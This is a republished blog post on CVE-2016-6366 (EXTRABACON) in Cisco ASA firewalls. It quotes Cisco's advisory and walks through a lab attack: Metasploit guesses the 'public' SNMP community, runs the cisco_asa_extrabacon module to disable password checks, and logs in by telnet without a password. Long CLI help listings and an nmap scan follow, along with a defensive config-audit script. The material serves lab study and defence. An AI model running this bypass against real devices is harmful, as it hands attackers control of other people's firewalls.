Vuln - Cisco - CVE-2016-6366

Source: Internet  Editor: 程序博客网  Time: 2024/04/30 14:35

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp says:

A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.

The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.

Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.

Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.

Exploit Cisco CVE-2016-6366

https://github.com/RiskSense-Ops/CVE-2016-6366/

msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run
[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed

Now telnet to the target host; no password is required.

$ telnet 192.168.206.114

Unprivileged Mode

ciscoasa> ?
  clear       Reset functions
  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Interactive help for commands
  login       Log in as a particular user
  logout      Exit from the EXEC
  no          Negate a command or set its defaults
  ping        Send echo messages
  quit        Exit from the EXEC
  show        Show running system information
  traceroute  Trace route to destination

Version

ciscoasa> show version

Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)

Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"

ciscoasa up 2 hours 25 mins

Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB

 0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
 1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
 2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
 3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10

ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:

Licensed features for this platform:
Virtual CPUs                      : 0              perpetual
Maximum Physical Interfaces       : 10             perpetual
Maximum VLANs                     : 50             perpetual
Inside Hosts                      : Unlimited      perpetual
Failover                          : Active/Standby perpetual
Encryption-DES                    : Enabled        perpetual
Encryption-3DES-AES               : Enabled        perpetual
Security Contexts                 : 0              perpetual
GTP/GPRS                          : Disabled       perpetual
AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual
Shared License                    : Disabled       perpetual
AnyConnect for Mobile             : Disabled       perpetual
AnyConnect for Cisco VPN Phone    : Disabled       perpetual
Advanced Endpoint Assessment      : Disabled       perpetual
UC Phone Proxy Sessions           : 2              perpetual
Total UC Proxy Sessions           : 2              perpetual
Botnet Traffic Filter             : Enabled        perpetual
Intercompany Media Engine         : Disabled       perpetual
Cluster                           : Disabled       perpetual

This platform has an ASAv VPN Premium license.

Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
Image type          : Release
Key version         : A

Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

Privileged Mode

ciscoasa> help enable
USAGE:
    enable [<priv_level>]
DESCRIPTION:
enable      Turn on privileged commands

ciscoasa> enable ?
  <0-15>  Enter optional privilege level (0-15)
  <cr>

ciscoasa> enable
Password:
ciscoasa# configure terminal
ciscoasa(config)# ?
  aaa                           Enable, disable, or view user authentication, authorization and accounting
  aaa-server                    Configure a AAA server group or a AAA server
  access-group                  Bind an access-list to an interface to filter traffic
  access-list                   Configure an access control element
  arp                           Change or view ARP table, set ARP timeout value, view statistics
  as-path                       BGP autonomous system path filter
  asdm                          Configure Device Manager
  asp                           Configure ASP parameters
  auth-prompt                   Customize authentication challenge, reject or acceptance prompt
  auto-update                   Configure Auto Update
  banner                        Configure login/session banners
  bgp-community                 format for BGP community
  boot                          Set system boot parameters
  ca                            Certification authority
  call-home                     Smart Call-Home Configuration
  checkheaps                    Configure checkheap verification intervals
  class-map                     Configure MPF Class Map
  clear                         Clear
  client-update                 Configure and change client update parameters
  clock                         Configure time-of-day clock
  cluster                       Cluster configuration
  command-alias                 Create command alias
  community-list                Add a community list entry
  compression                   Configure global Compression parameters
  configure                     Configure using various methods
  console                       Serial console functions
  coredump                      Configure Coredump options
  crashinfo                     Enable/Disable writing crashinfo to flash
  crypto                        Configure IPSec, ISAKMP, Certification authority, key
  ctl-file                      Configure a ctl-file instance
  ctl-provider                  Configure a CTL Provider instance
  cts                           Cisco Trusted Security commands
  ddns                          Configure dynamic DNS update method
  dhcp-client                   Configure parameters for DHCP client operation
  dhcpd                         Configure DHCP Server
  dhcprelay                     Configure DHCP Relay Agent
  dns                           Add DNS functionality to an interface
  dns-group                     Set the global DNS server group
  dns-guard                     Enforce one DNS response per query
  domain-name                   Change domain name
  dynamic-access-policy-record  Dynamic Access Policy configuration commands
  dynamic-filter                Configure Dynamic Filter
  dynamic-map                   Configure crypto dynamic map
  enable                        Configure password for the enable command
  end                           Exit from configure mode
  established                   Allow inbound connections based on established connections
  event                         Configure event manager
  exit                          Exit from config mode
  failover                      Enable/disable failover feature
  filter                        Enable or disable URL, FTP, HTTPS, Java, and ActiveX filtering
  fips                          FIPS 140-2 compliance information
  firewall                      Switch to router/transparent mode
  fixup                         Add or delete inspection services
  flow-export                   Configure flow information export through NetFlow
  fragment                      Configure the IP fragment database
  ftp                           Set FTP mode
  ftp-map                       Configure advanced options for FTP inspection
  group-delimiter               The delimiter for tunnel-group lookup.
  group-policy                  Configure or remove a group policy
  gtp-map                       Configure advanced options for GTP inspection
  h225-map                      Configure advanced options for H225 inspection
  help                          Interactive help for commands
  hostname                      Change host name of the system
  hpm                           Configure TopN host statistics collection
  http                          Configure http server and https related commands
  http-map                      This command has been deprecated.
  icmp                          Configure access rules for ICMP traffic
  imap4s                        Configure the imap4s service
  interface                     Select an interface to configure
  ip                            Configure IP address pools
  ip                            Configure IP addresses, address pools, IDS, etc
  ipsec                         Configure transform-set, IPSec SA lifetime and PMTU Aging reset timer
  ipv6                          Configure IPv6 address pools
  ipv6                          Global IPv6 configuration commands
  ipv6-vpn-addr-assign          Global settings for VPN IP address assignment policy
  isakmp                        Configure ISAKMP options
  jumbo-frame                   Configure jumbo-frame support
  key                           Create various configuration keys
  l2tp                          Configure Global L2TP Parameters
  ldap                          Configure LDAP Mapping
  logging                       Configure logging levels, recipients and other options
  logout                        Logoff from config mode
  mac-address                   MAC address options
  mac-list                      Create a mac-list to filter based on MAC address
  management-access             Configure management access interface
  map                           Configure crypto map
  media-termination             Configure a media-termination instance
  mgcp-map                      Configure advanced options for MGCP inspection
  migrate                       Migrate IKEv1 configuration to IKEv2/SSL
  monitor-interface             Enable or disable failover monitoring on a specific interface
  mount                         Configure a system mount
  mroute                        Configure static multicast routes
  mtu                           Specify MTU(Maximum Transmission Unit) for an interface
  multicast-routing             Enable IP multicast
  name                          Associate a name with an IP address
  names                         Enable/Disable IP address to name mapping
  nat                           Associate a network with a pool of global IP addresses
  no                            Negate a command or set its defaults
  ntp                           Configure NTP
  nve                           Configure an Network Virtulization Endpoint (NVE)
  object                        Configure an object
  object-group                  Create an object group for use in 'access-list', etc
  object-group-search           Enables object group search algorithm
  pager                         Control page length for pagination
  passwd                        Change Telnet console access password
  password                      Configure password encryption
  password-policy               Configure password policy options
  phone-proxy                   Configure a Phone proxy instance
  pim                           Configure Protocol Independent Multicast
  policy-list                   Define IP Policy list
  policy-map                    Configure MPF Parameter Map
  pop3s                         Configure the pop3s service
  prefix-list                   Build a prefix list
  priority-queue                Enter sub-command mode to set priority-queue attributes
  privilege                     Configure privilege levels for commands
  prompt                        Configure session prompt display
  quit                          Exit from config mode
  quota                         Configure quotas
  regex                         Define a regular expression
  remote-access                 Configure SNMP trap threshold for VPN remote-access sessions
  route                         Configure a static route for an interface
  route-map                     Create route-map or enter route-map configuration mode
  router                        Enable a routing process
  same-security-traffic         Enable same security level interfaces to communicate
  scansafe                      Scansafe configuration
  service                       Configure system services
  service-interface             service-interface for dynamic interface types
  service-policy                Configure MPF service policy
  setup                         Pre-configure the system
  sla                           IP Service Level Agreement
  smtp-server                   Configure default SMTP server address to be used for Email
  smtps                         Configure the smtps service
  snmp                          Configure the SNMP options
  snmp-map                      Configure an snmp-map, to control the operation of the SNMP inspection
  snmp-server                   Modify SNMP engine parameters
  ssh                           Configure SSH options
  ssl                           Configure SSL options
  sunrpc-server                 Create SUNRPC services table
  sysopt                        Set system functional options
  tcp-map                       Configure advanced options for TCP inspection
  telnet                        Add telnet access to system console or set idle timeout
  terminal                      Set terminal line parameters
  tftp-server                   Configure default TFTP server address and directory
  threat-detection              Show threat detection information
  time-range                    Define time range entries
  timeout                       Configure maximum idle times
  tls-proxy                     Configure a TLS proxy instance or the maximum sessions
  track                         Object tracking configuration commands
  tunnel-group                  Create and manage the database of connection specific records for IPSec connections
  tunnel-group-map              Specify policy by which the tunnel-group name is derived from the content of a certificate.
  uc-ime                        Configure a Cisco Intercompany Media Engine (UC-IME) instance
  url-block                     Enable URL pending block buffer and long URL support
  url-cache                     Enable/Disable URL caching
  url-server                    Configure a URL filtering server
  user-identity                 Configure user-identity firewall
  username                      Configure user authentication local database
  virtual                       Configure address for authentication virtual servers
  vnmc                          Configure VNMC params
  vpdn                          Configure VPDN feature
  vpn                           Configure VPN parameters.
  vpn-addr-assign               Global settings for VPN IP address assignment policy
  vpn-sessiondb                 Configure the VPN Session Manager
  vpnsetup                      Configure VPN Setup Commands
  vxlan                         Configure VXLAN system parameters
  wccp                          Web-Cache Coordination Protocol Commands
  webvpn                        Configure the WebVPN service
  xlate                         Configure an xlate option
  zonelabs-integrity            ZoneLabs integrity Firewall Server Configuration

Cisco Terminal

ciscoasa> enable
Password:
ciscoasa# configure ?
  terminal  Configure using terminal/console
ciscoasa# configure terminal
ciscoasa(config)#

Cisco Interfaces

ciscoasa(config)# interface ?
configure mode commands/options:
  GigabitEthernet  GigabitEthernet IEEE 802.3z
  Management       Management interface
  Redundant        Redundant Interface
  TVI              Tenant Virtual Interface
  vni              VNI Interface
  <cr>
ciscoasa(config)# interface GigabitEthernet ?
configure mode commands/options:
  <0-0>  GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0?
configure mode commands/options:
  /
ciscoasa(config)# interface GigabitEthernet 0/?
configure mode commands/options:
  <0-2>  GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/0

Cisco Interface Config - set an IP address

ciscoasa(config-if)# ?
Interface configuration commands:
  authentication   authentication subcommands
  ddns             Configure dynamic DNS
  default          Set a command to its defaults
  delay            Specify interface throughput delay
  description      Interface specific description
  dhcp             Configure parameters for DHCP client
  dhcprelay        Configure DHCP Relay Agent
  duplex           Configure duplex operation
  exit             Exit from interface configuration mode
  flowcontrol      Configure flowcontrol operation
  hello-interval   Configures EIGRP-IPv4 hello interval
  help             Interactive help for interface subcommands
  hold-time        Configures EIGRP-IPv4 hold time
  igmp             IGMP interface commands
  ip               Configure the ip address
  ipv6             IPv6 interface subcommands
  mac-address      Assign MAC address to interface
  management-only  Dedicate an interface to management. Block thru traffic
  mfib             Interface Specific MFIB Control
  multicast        Configure multicast routing
  nameif           Assign name to interface
  no               Negate a command or set its defaults
  ospf             OSPF interface commands
  pim              PIM interface commands
  pppoe            Configure parameters for PPPoE client
  rip              Router Information Protocol
  security-level   Specify the security level of this interface after this keyword, Eg: 0, 100 etc. The relative security level between two interfaces determines the way the Adaptive Security Algorithm is applied. A lower security_level interface is outside relative to a higher level interface and equivalent interfaces are outside to each other
  shutdown         Shutdown the selected interface
  speed            Configure speed operation
  split-horizon    Configures EIGRP-IPv4 split-horizon
  summary-address  Configures EIGRP-IPv4 summary-address

ciscoasa(config-if)# ip address ?
interface mode commands/options:
  Hostname or A.B.C.D  Firewall's network interface address
  dhcp                 Keyword to use DHCP to poll for information. Enables the DHCP client feature on the specified interface
  pppoe                Keyword to use PPPoE to poll for information. Enables the PPPoE client feature on the specified interface
ciscoasa(config)#  ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit

ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

Enable SNMP

ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

Enable SSH

ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?
configure mode commands/options:
  general-keys  Generate a general purpose RSA key pair for signing and encryption
  label         Provide a label
  modulus       Provide number of modulus bits on the command line
  noconfirm     Specify this keyword to suppress all interactive prompting.
  usage-keys    Generate seperate RSA key pairs for signing and encryption
  <cr>
ciscoasa(config)# crypto key generate rsa modulus ?
configure mode commands/options:
  1024  1024 bits
  2048  2048 bits
  4096  4096 bits
  512   512 bits
  768   768 bits
ciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)#  ssh version 2

Enable Telnet

ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
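The advisory's only precondition is knowledge of the community string, and the lab above hands that out as `public` while also opening telnet to any source. As an added defender-side check (not part of the original post), the following Python audits those management lines from an ASA configuration; the running-config layout of the constructed sample and the weak-community list are assumptions.

```python
import ipaddress
import re

# Constructed sample: the management lines this lab configures, written the
# way they appear in an ASA running-config (assumption about layout).
SAMPLE_CONFIG = """\
hostname ciscoasa
interface GigabitEthernet0/0
 nameif inside
 security-level 100
 ip address 192.168.206.114 255.255.255.0
snmp-server host inside 192.168.206.1 community 0 public
aaa authentication ssh console LOCAL
aaa authentication telnet console LOCAL
ssh 192.168.206.1 255.255.255.0 inside
ssh 192.168.206.137 255.255.255.0 inside
ssh version 2
telnet 0.0.0.0 0.0.0.0 inside
"""

# Community strings that are vendor defaults or sit in every wordlist (assumed
# list); guessing one satisfies the advisory's "must know the community string".
WEAK_COMMUNITIES = {"public", "private", "cisco", "admin"}

# snmp-server host <ifname> <host> [trap|poll] [community [0|8] <string>] ...
SNMP_HOST_RE = re.compile(
    r"^snmp-server host (\S+) (\S+)(?:.*?\bcommunity (?:\d+ )?(\S+))?"
)
# Legacy global form: snmp-server community [0|8] <string>
SNMP_COMMUNITY_RE = re.compile(r"^snmp-server community (?:\d+ )?(\S+)")
# telnet|ssh <addr> <mask> <ifname>: which sources may reach the CLI
MGMT_ACL_RE = re.compile(
    r"^(telnet|ssh) (\d+\.\d+\.\d+\.\d+) (\d+\.\d+\.\d+\.\d+) (\S+)"
)


def audit_asa_config(config: str) -> list[str]:
    """Return one finding per risky SNMP or remote-management line in config."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = SNMP_HOST_RE.match(line)
        if m:
            ifname, host, community = m.groups()
            # Every permitted poller is a host whose community is worth knowing.
            findings.append(f"snmp: poller {host} allowed on interface {ifname}")
            if community and community.lower() in WEAK_COMMUNITIES:
                findings.append(
                    f"snmp: weak community '{community}' for poller {host}"
                )
            continue
        m = SNMP_COMMUNITY_RE.match(line)
        if m and m.group(1).lower() in WEAK_COMMUNITIES:
            findings.append(f"snmp: weak global community '{m.group(1)}'")
            continue
        m = MGMT_ACL_RE.match(line)
        if m:
            proto, addr, mask, ifname = m.groups()
            net = ipaddress.IPv4Network((addr, mask), strict=False)
            if net.prefixlen == 0:
                findings.append(
                    f"{proto}: any source may connect on interface {ifname}"
                )
            elif proto == "telnet":
                findings.append(f"telnet: cleartext management from {net} on {ifname}")
    return findings


if __name__ == "__main__":
    for finding in audit_asa_config(SAMPLE_CONFIG):
        print(finding)
```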

Nmap scan

sec@gpg:~$ nmap -v -n -Pn -sV --open 192.168.206.114

Starting Nmap 6.40 ( http://nmap.org ) at 2016-09-26 04:01 CDT
NSE: Loaded 23 scripts for scanning.
Initiating Connect Scan at 04:01
Scanning 192.168.206.114 [1000 ports]
Discovered open port 23/tcp on 192.168.206.114
Discovered open port 22/tcp on 192.168.206.114
Completed Connect Scan at 04:01, 4.83s elapsed (1000 total ports)
Initiating Service scan at 04:01
Scanning 2 services on 192.168.206.114
Completed Service scan at 04:01, 0.00s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.206.114.
Nmap scan report for 192.168.206.114
Host is up (0.00040s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Cisco SSH 1.25 (protocol 2.0)
23/tcp open  telnet  Cisco ASA 5505 firewall telnetd
Service Info: OS: IOS; Device: firewall; CPE: cpe:/o:cisco:ios

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

References

https://github.com/RiskSense-Ops/CVE-2016-6366/
http://paper.seebug.org/31/
http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
